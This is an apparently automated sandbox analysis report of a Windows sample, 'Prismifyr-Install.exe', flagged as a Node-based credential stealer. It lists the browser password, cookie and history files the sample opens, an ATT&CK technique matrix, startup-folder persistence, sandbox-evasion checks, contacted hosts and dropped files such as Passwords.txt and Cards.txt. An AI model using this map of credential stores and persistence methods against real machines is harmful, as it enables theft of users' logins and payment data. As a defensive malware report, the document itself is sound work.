      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCK
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_and_features_store
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\edge\User Data\Default\History
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Vortex_Cookies
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG.old
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\discounts_db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite-shm
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\edge\User Data\Default\History Provider Cache
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Trusted Vault
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadata
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite-wal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SharedStorage
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\edge\User Data\Default\history.db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\edge\User Data\Default\History-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnWebGPUCache
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\edge\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeDirectory queried: C:\Users\user\Documents

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe, type: DROPPED
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid Accounts311
      Windows Management Instrumentation
      1
      Scripting
      11
      Process Injection
      11
      Masquerading
      1
      OS Credential Dumping
      41
      Security Software Discovery
      Remote Services1
      Email Collection
      12
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      12
      Registry Run Keys / Startup Folder
      12
      Registry Run Keys / Startup Folder
      11
      Disable or Modify Tools
      LSASS Memory2
      Process Discovery
      Remote Desktop Protocol21
      Data from Local System
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      231
      Virtualization/Sandbox Evasion
      Security Account Manager231
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets1
      System Network Configuration Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials11
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync134
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523536 Sample: Prismifyr-Install.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 72 94 www.myexternalip.com 2->94 96 api.ipify.org 2->96 108 Yara detected Node Stealer 2->108 110 Yara detected Powershell download and execute 2->110 112 Sigma detected: Dot net compiler compiles file from suspicious location 2->112 10 Prismifyr-Install.exe 96 2->10         started        15 Prismifyr-Install.exe 2->15         started        signatures3 process4 dnsIp5 98 www.myexternalip.com 34.160.111.145, 443, 49766, 49768 ATGS-MMD-ASUS United States 10->98 78 C:\Users\user\...\Prismifyr-Install.exe, PE32+ 10->78 dropped 80 C:\...\Prismifyr-Install.exe:Zone.Identifier, ASCII 10->80 dropped 82 C:\Users\user\AppData\Local\...\history.db, SQLite 10->82 dropped 90 13 other files (11 malicious) 10->90 dropped 120 Drops PE files to the startup folder 10->120 122 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->122 124 Detected generic credential text file 10->124 17 cmd.exe 1 10->17         started        20 cmd.exe 1 10->20         started        22 cmd.exe 10->22         started        30 14 other processes 10->30 84 C:\ProgramData\Steam\...\Passwords.txt, ASCII 15->84 dropped 86 C:\ProgramData\Steam\Launcher\...\Cards.txt, ASCII 15->86 dropped 88 C:\ProgramData\Steam\...behaviorgraphoogle_Default.txt, ASCII 15->88 dropped 92 2 other malicious files 15->92 dropped 126 Tries to harvest and steal browser information (history, passwords, etc) 15->126 24 cmd.exe 15->24         started        26 cmd.exe 15->26         started        28 cmd.exe 15->28         started        32 14 other processes 15->32 file6 signatures7 process8 signatures9 104 Suspicious powershell command line found 17->104 106 Bypasses PowerShell execution policy 17->106 34 powershell.exe 22 17->34         started        38 WMIC.exe 1 20->38         started        40 powershell.exe 22->40         started        42 powershell.exe 24->42         started        44 powershell.exe 26->44         started        46 curl.exe 28->46         started        49 csc.exe 30->49         started        51 14 other processes 30->51 53 14 other processes 32->53 process10 dnsIp11 70 C:\Users\user\AppData\...\1d1qdkxo.cmdline, Unicode 34->70 dropped 114 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 34->114 55 csc.exe 3 34->55         started        116 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 38->116 118 Queries memory information (via WMI often done to detect virtual machines) 38->118 58 csc.exe 42->58         started        100 172.67.74.152, 49767, 80 CLOUDFLARENETUS United States 46->100 72 C:\Users\user\...\screenCapture_1.3.2.exe, PE32 49->72 dropped 60 cvtres.exe 49->60         started        102 api.ipify.org 104.26.13.205, 49765, 80 CLOUDFLARENETUS United States 51->102 62 mshta.exe 51->62         started        64 mshta.exe 53->64         started        file12 signatures13 process14 file15 74 C:\Users\user\AppData\Local\...\1d1qdkxo.dll, PE32 55->74 dropped 66 cvtres.exe 1 55->66         started        76 C:\Users\user\AppData\Local\...\mydyhibp.dll, PE32 58->76 dropped 68 cvtres.exe 58->68         started        process16

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds\win32-x64\node.napi.node0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      api.ipify.org
      104.26.13.205
      truefalse
        unknown
        www.myexternalip.com
        34.160.111.145
        truefalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://github.com/nodejs/node/pull/36061#discussion_r533718029Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://url.spec.whatwg.org/#concept-url-originPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://tools.ietf.org/html/rfc6455#section-1.3Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                unknown
                https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDashPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                  unknown
                  https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorithPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://www.ecma-international.org/ecma-262/8.0/#sec-atomescapePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                      unknown
                      https://www.ecma-international.org/ecma-262/8.0/#prod-AtomPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                        unknown
                        https://gist.github.com/XVilka/8346728#gistcomment-2823421Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                          unknown
                          https://github.com/nodejs/node-v0.x-archive/issues/2876.Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                            unknown
                            https://www.ecma-international.org/ecma-262/#sec-timeclipPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://console.spec.whatwg.org/#tablePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://www.iana.org/assignments/tls-extensiontype-valuesPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                  unknown
                                  https://github.com/nodejs/node/issues/35475Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                    unknown
                                    https://github.com/chalk/ansi-regex/blob/HEAD/index.jsPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://console.spec.whatwg.org/#console-namespacePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://nodejs.org/api/fs.html#fs_stat_time_values)Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                          unknown
                                          https://url.spec.whatwg.org/#urlPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://encoding.spec.whatwg.org/#textencoderPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://github.com/nodejs/node/issues/13435Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                unknown
                                                https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDashPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                  unknown
                                                  https://github.com/tc39/proposal-weakrefsPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                    unknown
                                                    https://goo.gl/t5IS6M).Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
